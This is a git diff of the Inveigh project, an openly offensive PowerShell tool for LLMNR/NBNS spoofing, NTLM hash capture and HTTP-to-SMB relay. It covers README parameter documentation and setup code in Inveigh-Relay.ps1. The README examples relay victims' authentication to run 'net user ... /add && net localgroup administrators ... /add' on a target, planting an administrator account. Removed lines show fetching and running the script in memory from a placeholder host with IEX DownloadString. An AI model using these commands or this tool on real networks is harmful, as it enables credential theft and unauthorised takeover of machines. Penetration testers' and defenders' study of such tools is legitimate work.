for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. -* __WPADIP__ - Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. -* __WPADPort__ - Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. +* __HTTPIP__ - Default = Any: IP address for the HTTP listener. +* __HTTPPort__ - Default = 80: TCP port for the HTTP listener. +* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server. +* __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. Use PowerShell character escapes where necessary. +* __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. +* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. +* __WPADEmptyFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse. +* __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. +* __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. * __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. -* __WPADResponse__ - Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. -* __Challenge__ - Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. +* __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. +* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. * __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -* __ConsoleOutput__ - Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. +* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. +* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled. * __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output. +* __FileUnique__ - Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time file output is enabled. * __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. * __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Brute Force through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. -* __OutputDir__ - Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled. +* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. * __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup. -* __RunCount__ - Default = Unlimited: (Integer) Set the number of captures to perform before auto-exiting. -* __RunTime__ - Default = Unlimited: (Integer) Set the run time duration in minutes. +* __RunCount__ - Default = Unlimited: (Integer) Number of captures to perform before auto-exiting. +* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes. * __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire ### Invoke-InveighRelay @@ -127,16 +207,27 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * HTTP/HTTPS to SMB NTLMv2 relay with granular control * NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS * Granular control of console and file output -* Can be executed as either a standalone function or through Invoke-Inveigh + +##### Examples: +* To execute with basic options: + Invoke-Inveigh -HTTP N + Invoke-InveighRelay -SMBRelayTarget 192.168.1.50 -SMBRelayCommand "net user Inveigh Summer2016 /add && net localgroup administrators Inveigh /add" + +* To execute with and only perform SMB relay with the 'Administrator' account: + Invoke-InveighUnprivileged -HTTP N + Invoke-InveighRelay -SMBRelayTarget 192.168.1.50 -SMBRelayCommand "net user Inveigh Summer2016 /add && net localgroup administrators Inveigh /add" -SMBRelayUsernames Administrator + +##### Screenshot: + ##### Parameters: * __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. * __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store. -* __HTTPSCertAppID__ - Specify a valid application GUID for use with the ceriticate. -* __HTTPSCertThumbprint__ - Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx. -* __Challenge__ - Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target. +* __HTTPSCertAppID__ - Valid application GUID for use with the ceriticate. +* __HTTPSCertThumbprint__ - Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx. +* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target. * __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -* __WPADAuth__ - Default = NTLM: (Anonymous,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. +* __WPADAuth__ - Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. * __SMBRelayTarget__ - IP address of system to target for SMB relay. * __SMBRelayCommand__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary. * __SMBRelayUsernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. @@ -146,82 +237,20 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output. * __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. * __OutputStreamOnly__ - Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. -* __OutputDir__ - Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled. +* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. * __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup. -* __RunTime__ - Default = Unlimited: (Integer) Set the run time duration in minutes. +* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes. * __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire +##### Notes: +* Ensure that any needed HTTP, HTTPS ports are open within any local firewall on the host system. +* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns. + ### Support Functions -* __Get-Inveigh__ - Get queued console output -* __Get-InveighCleartext__ - Get all captured cleartext credentials -* __Get-InveighLog__ - Get log entries -* __Get-InveighNTLMv1__ - Get all or unique (-unique) captured NTLMv1 challenge/response hashes -* __Get-InveighNTLMv2__ - Get all or unique (-unique) captured NTLMv2 challenge/response hashes -* __Watch-Inveigh__ - Enable real time console output * __Clear-Inveigh__ - Clear Inveigh data from memory +* __Get-Inveigh__ - Get Inveigh data from memory - Parameters: Console, ClearText, CleartextUnique, Learning, Log, NTLMv1, NTLMv1Unique, NTLMv1Usernames, NTLMv2, NTLMv2Unique, NTLMv2Usernames * __Stop-Inveigh__ - Stop all running Inveigh functions +* __Watch-Inveigh__ - Enable real time console output -## Miscellaneous Notes -* The local LLMNR/NBNS services do not need to be disabled on the host system. -* LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind. -* Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS. -* Ensure that any needed LMMNR,NBNS,SMB,HTTP,HTTPS ports are open within any local firewall on the host system. -* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns. - -## System Requirements -* Tested minimums are PowerShell 2.0 and .NET 3.5 - -## Usage -* To import with Import-Module: - Import-Module ./Inveigh.psd1 - -* To import using dot source method: - . ./Inveigh.ps1 - . ./Inveigh-BruteForce.ps1 - . ./Inveigh-Relay.ps1 - -* To load into memory using Invoke-Expression: - IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1") - IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1") - -## Examples -* To execute with default settings: - Invoke-Inveigh - -* To load and execute with one line: - Import-Module ./Inveigh.ps1;Invoke-Inveigh - -* To execute with parameters (Use 'Get-Help -parameter * Invoke-Inveigh' for a full list of parameters): - Invoke-Inveigh -IP 'local IP' -SpooferIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ConsoleOutput Y/N -FileOutput Y/N -OutputDir 'valid folder path' - -* To execute with SMB relay enabled through Invoke-Inveigh: - Invoke-Inveigh -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target" - -* To execute SMB relay with only Invoke-InveighRelay: - Invoke-InveighRelay -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target" - -* To execute Inveigh-BruteForce against a target: - Invoke-InveighRelay -SpooferTarget 'remote or local target IP' - -## Included In -* PowerShell Empire - https://github.com/PowerShellEmpire/Empire -* PS>Attack - https://github.com/jaredhaight/psattack -* p0wnedShell - https://github.com/Cn33liz/p0wnedShell - -## Special Thanks -* Anyone that posted .NET packet sniffing examples. -* Responder - https://github.com/SpiderLabs/Responder -* Impacket - https://github.com/CoreSecurity/impacket - -## Screenshots -Invoke-Inveigh execution with real time console and file output enabled - - -Retrieval of captured NTLM2 challenge/response hashes with Get-InveighNTLMv2 - - -HTTP to SMB Relay - - -Module import and execution through one of Ben Turner and Dave Hardy's Metasploit Interactive PowerShell Session payloads - +##### Screenshot: + diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1 index f8ce03e..f766b71 100644 --- a/Scripts/Inveigh-Relay.ps1 +++ b/Scripts/Inveigh-Relay.ps1 @@ -22,23 +22,23 @@ the local store and attached to port 443. If the script does not exit gracefully in the cert store. .PARAMETER HTTPSCertAppID -Specify a valid application GUID for use with the ceriticate. +Valid application GUID for use with the ceriticate. .PARAMETER HTTPSCertThumbprint -Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in -the current working directory and named Inveigh.pfx. +Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current +working directory and named Inveigh.pfx. .PARAMETER Challenge -Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a -random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be +Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random +challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target. .PARAMETER MachineAccounts Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. .PARAMETER WPADAuth -Default = NTLM: (Anonymous,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting -to Anonymous can prevent browser login prompts. +Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to +Anonymous can prevent browser login prompts. .PARAMETER SMBRelayTarget IP address of system to target for SMB relay. @@ -51,11 +51,12 @@ Default = All Usernames: Comma separated list of usernames to use for relay atta domain\username format. .PARAMETER SMBRelayAutoDisable -Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target. +Default = Enable: (Y/N) Enable/Disable automaticaly disabling SMB relay after a successful command execution on +target. .PARAMETER SMBRelayNetworkTimeout -Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay -target after each packet is sent. +Default = No Timeout: (Integer) Duration in seconds that Inveigh will wait for a reply from the SMB relay target +after each packet is sent. .PARAMETER ConsoleOutput Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to @@ -73,22 +74,24 @@ running Inveigh Relay through a shell that does not return other output streams. various yellow warning messages if enabled. .PARAMETER OutputDir -Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must -also be enabled. +Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be +enabled. .PARAMETER RunTime -(Integer) Set the run time duration in minutes. +(Integer) Run time duration in minutes. .PARAMETER ShowHelp Default = Enabled: (Y/N) Enable/Disable the help messages at startup. .PARAMETER Tool -Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's -Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire +Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's +PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire. +0 = None, 1 = Metasploit/Meterpreter, 2 = Empire .EXAMPLE +Invoke-Inveigh -HTTP N Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add" -Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay +Perform SMB relay with a command that will create a local administrator account on the SMB relay target. .LINK @@ -99,26 +102,26 @@ https://github.com/Kevin-Robertson/Inveigh [CmdletBinding()] param ( - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelayAutoDisable="Y", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth="NTLM", - [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir="", - [parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SMBRelayTarget ="", - [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge="", - [parameter(Mandatory=$false)][Array]$SMBRelayUsernames="", - [parameter(Mandatory=$false)][Int]$SMBRelayNetworkTimeout="", - [parameter(Mandatory=$false)][Int]$RunTime="", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelayAutoDisable = "Y", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "", + [parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SMBRelayTarget = "", + [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", + [parameter(Mandatory=$false)][Array]$SMBRelayUsernames = "", + [parameter(Mandatory=$false)][Int]$SMBRelayNetworkTimeout = "", + [parameter(Mandatory=$false)][Int]$RunTime = "", [parameter(Mandatory=$true)][String]$SMBRelayCommand = "", - [parameter(Mandatory=$false)][String]$HTTPSCertAppID="00112233-4455-6677-8899-AABBCCDDEEFF", - [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint="98c1d54840c5c12ced710758b6ee56cc62fa1f0d", + [parameter(Mandatory=$false)][String]$HTTPSCertAppID = "00112233-4455-6677-8899-AABBCCDDEEFF", + [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint = "98c1d54840c5c12ced710758b6ee56cc62fa1f0d", [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter ) @@ -127,6 +130,11 @@ if ($invalid_parameter) throw "$($invalid_parameter) is not a valid parameter." } +if($inveigh.HTTP -or $inveigh.HTTPS) +{ + throw "You must stop stop other Inveigh HTTP/HTTPS listeners before running this module." +} + if(!$SMBRelayTarget) { throw "You must specify an -SMBRelayTarget if enabling -SMBRelay" @@ -157,31 +165,33 @@ if(!$inveigh) $inveigh.cleartext_list = New-Object System.Collections.ArrayList $inveigh.IP_capture_list = New-Object System.Collections.ArrayList $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList + $inveigh.valid_host_list = New-Object System.Collections.ArrayList } -if($inveigh.HTTP_listener.IsListening) +if($inveigh.HTTP_listener.IsListening -and !$inveigh.running) { $inveigh.HTTP_listener.Stop() $inveigh.HTTP_listener.Close() } -if(!$inveigh.running) +if(!$inveigh.running -or !$inveigh.unprivileged_running) { $inveigh.console_queue = New-Object System.Collections.ArrayList $inveigh.status_queue = New-Object System.Collections.ArrayList $inveigh.log_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList + $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList + $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList $inveigh.certificate_application_ID = $HTTPSCertAppID $inveigh.certificate_thumbprint = $HTTPSCertThumbprint - $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList $inveigh.console_output = $false $inveigh.console_input = $true $inveigh.file_output = $false $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" - $Inveigh.challenge = $Challenge + $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" } $inveigh.relay_running = $true @@ -206,7 +216,7 @@ else $inveigh.output_stream_only = $false } -if($Tool -eq 1) # Metasploit Interactive Powershell +if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension { $inveigh.tool = 1 $inveigh.output_stream_only = $true @@ -229,30 +239,58 @@ else } # Write startup messages -if(!$inveigh.running) +$inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null +$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null + +$firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'} + +if($firewall_status) { - $inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null + $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null - $firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'} + $firewall_rules = New-Object -comObject HNetCfg.FwPolicy2 + $firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}" - if($firewall_status) + if($firewall_powershell) { - $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null + $inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed") > $null } +} + +if($HTTP -eq 'Y') +{ + + $HTTP_port_check = netstat -anp TCP | findstr 0.0.0.0:80 - if($HTTP -eq 'Y') + if($HTTP_port_check) { - $inveigh.HTTP = $true - $inveigh.status_queue.Add("HTTP Capture Enabled") > $null + $inveigh.HTTP = $false + $inveigh.status_queue.Add("HTTP Capture/Relay Disabled Due To In Use Port 80") > $null } else { - $inveigh.HTTP = $false - $inveigh.status_queue.Add("HTTP Capture Disabled") > $null + $inveigh.HTTP = $true + $inveigh.status_queue.Add("HTTP Capture/Relay = Enabled") > $null } - if($HTTPS -eq 'Y') +} +else +{ + $inveigh.HTTP = $false + $inveigh.status_queue.Add("HTTP Capture/Relay = Disabled") > $null +} + +if($HTTPS -eq 'Y') +{ + + $HTTPS_port_check = netstat -anp TCP | findstr 0.0.0.0:443 + + if($HTTPS_port_check) + { + $inveigh.HTTP = $true + $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To In Use Port 443") > $null + } + else { try @@ -268,31 +306,35 @@ if(!$inveigh.running) $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}" $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID) & "netsh" $netsh_arguments > $null - $inveigh.status_queue.Add("HTTPS Capture Enabled") > $null + $inveigh.status_queue.Add("HTTPS Capture/Relay = Enabled") > $null } catch { $certificate_store.Close() $HTTPS="N" $inveigh.HTTPS = $false - $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error") > $null + $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To Certificate Install Error") > $null } } - else - { - $inveigh.status_queue.Add("HTTPS Capture Disabled") > $null - } + +} +else +{ + $inveigh.status_queue.Add("HTTPS Capture/Relay = Disabled") > $null +} + +if($inveigh.HTTP -or $inveigh.HTTPS) +{ if($Challenge) { - $Inveigh.challenge = $challenge $inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null } if($MachineAccounts -eq 'N') { - $inveigh.status_queue.Add("Ignoring Machine Accounts") > $null + $inveigh.status_queue.Add("Machine Account Capture = Disabled") > $null $inveigh.machine_accounts = $false } else @@ -300,84 +342,93 @@ if(!$inveigh.running) $inveigh.machine_accounts = $true } - $inveigh.status_queue.Add("Force WPAD Authentication = $WPADAuth") > $null + $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null - if($ConsoleOutput -eq 'Y') - { - $inveigh.status_queue.Add("Real Time Console Output Enabled") > $null - $inveigh.console_output = $true - } - else - { +} - if($inveigh.tool -eq 1) - { - $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null - } - else - { - $inveigh.status_queue.Add("Real Time Console Output Disabled") > $null - } +$inveigh.status_queue.Add("SMB Relay Target = $SMBRelayTarget") > $null - } +if($SMBRelayUsernames) +{ - if($FileOutput -eq 'Y') + if($SMBRelayUsernames.Count -eq 1) { - $inveigh.status_queue.Add("Real Time File Output Enabled") > $null - $inveigh.status_queue.Add("Output Directory = $output_directory") > $null - $inveigh.file_output = $true + $inveigh.status_queue.Add("SMB Relay Username = " + ($SMBRelayUsernames -join ",")) > $null } else { - $inveigh.status_queue.Add("Real Time File Output Disabled") > $null + $inveigh.status_queue.Add("SMB Relay Usernames = " + ($SMBRelayUsernames -join ",")) > $null } - if($RunTime -eq 1) +} + +if($SMBRelayAutoDisable -eq 'Y') +{ + $inveigh.status_queue.Add("SMB Relay Auto Disable = Enabled") > $null +} +else +{ + $inveigh.status_queue.Add("SMB Relay Auto Disable = Disabled") > $null +} + +if($SMBRelayNetworkTimeout) +{ + $inveigh.status_queue.Add("SMB Relay Network Timeout = $SMBRelayNetworkTimeout Seconds") > $null +} + +if($ConsoleOutput -eq 'Y') +{ + $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null + $inveigh.console_output = $true +} +else +{ + + if($inveigh.tool -eq 1) { - $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null + $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null } - elseif($RunTime -gt 1) + else { - $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null + $inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null } } -$inveigh.status_queue.Add("SMB Relay Enabled") > $null -$inveigh.status_queue.Add("SMB Relay Target = $SMBRelayTarget") > $null - -if($SMBRelayUsernames) +if($FileOutput -eq 'Y') { - if($SMBRelayUsernames.Count -eq 1) + if($inveigh.file_output) { - $inveigh.status_queue.Add("SMB Relay Username = " + $SMBRelayUsernames -join ",") > $null + $inveigh.file_output = $false } else { - $inveigh.status_queue.Add("SMB Relay Usernames = " + $SMBRelayUsernames -join ",") > $null + $inveigh.file_output = $true } -} + $inveigh.status_queue.Add("Real Time File Output = Enabled") > $null + $inveigh.status_queue.Add("Output Directory = $output_directory") > $null + $inveigh.file_output = $true -if($SMBRelayAutoDisable -eq 'Y') -{ - $inveigh.status_queue.Add("SMB Relay Auto Disable Enabled") > $null } else { - $inveigh.status_queue.Add("SMB Relay Auto Disable Disabled") > $null + $inveigh.status_queue.Add("Real Time File Output = Disabled") > $null } -if($SMBRelayNetworkTimeout) +if($RunTime -eq 1) { - $inveigh.status_queue.Add("SMB Relay Network Timeout = $SMBRelayNetworkTimeout Seconds") > $null + $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null +} +elseif($RunTime -gt 1) +{ + $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null } if($ShowHelp -eq 'Y') { - $inveigh.status_queue.Add("Use Get-Command -Noun Inveigh* to show available functions") > $null - $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh") > $null + $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh-Relay") > $null if($inveigh.console_output) { @@ -395,30 +446,36 @@ if($inveigh.status_output) if($inveigh.output_stream_only) { Write-Output($inveigh.status_queue[0] + $inveigh.newline) - $inveigh.status_queue.RemoveRange(0,1) + $inveigh.status_queue.RemoveAt(0) } else { - switch ($inveigh.status_queue[0]) + switch -Wildcard ($inveigh.status_queue[0]) { - "Run Stop-Inveigh to stop Inveigh" + "* Disabled Due To *" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } + + "Run Stop-Inveigh to stop Inveigh-Relay" { Write-Warning($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) + $inveigh.status_queue.RemoveAt(0) } "Windows Firewall = Enabled" { Write-Warning($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) + $inveigh.status_queue.RemoveAt(0) } default { Write-Output($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) + $inveigh.status_queue.RemoveAt(0) } } @@ -432,44 +489,41 @@ if($inveigh.status_output) $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) $process_ID = $process_ID -replace "-00-00","" -[Byte[]] $inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} +[Byte[]]$inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} # Begin ScriptBlocks # Shared Basic functions ScriptBlock $shared_basic_functions_scriptblock = { - function DataToUInt16($field) - { - [Array]::Reverse($field) - return [System.BitConverter]::ToUInt16($field,0) - } - function DataToUInt32($field) + function DataLength2 { - [Array]::Reverse($field) - return [System.BitConverter]::ToUInt32($field,0) + param ([Int]$length_start,[Byte[]]$string_extract_data) + + $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0) + return $string_length } - function DataLength + function DataLength4 { param ([Int]$length_start,[Byte[]]$string_extract_data) - $string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start + 1)],0) + $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0) return $string_length } function DataToString { - param ([Int]$string_length,[Int]$string2_length,[Int]$string3_length,[Int]$string_start,[Byte[]]$string_extract_data) + param ([Int]$string_start,[Int]$string_length,[Byte[]]$string_extract_data) - $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length - 1)]) + $string_data = [System.BitConverter]::ToString($string_extract_data[$string_start..($string_start + $string_length - 1)]) $string_data = $string_data -replace "-00","" $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $string_extract = 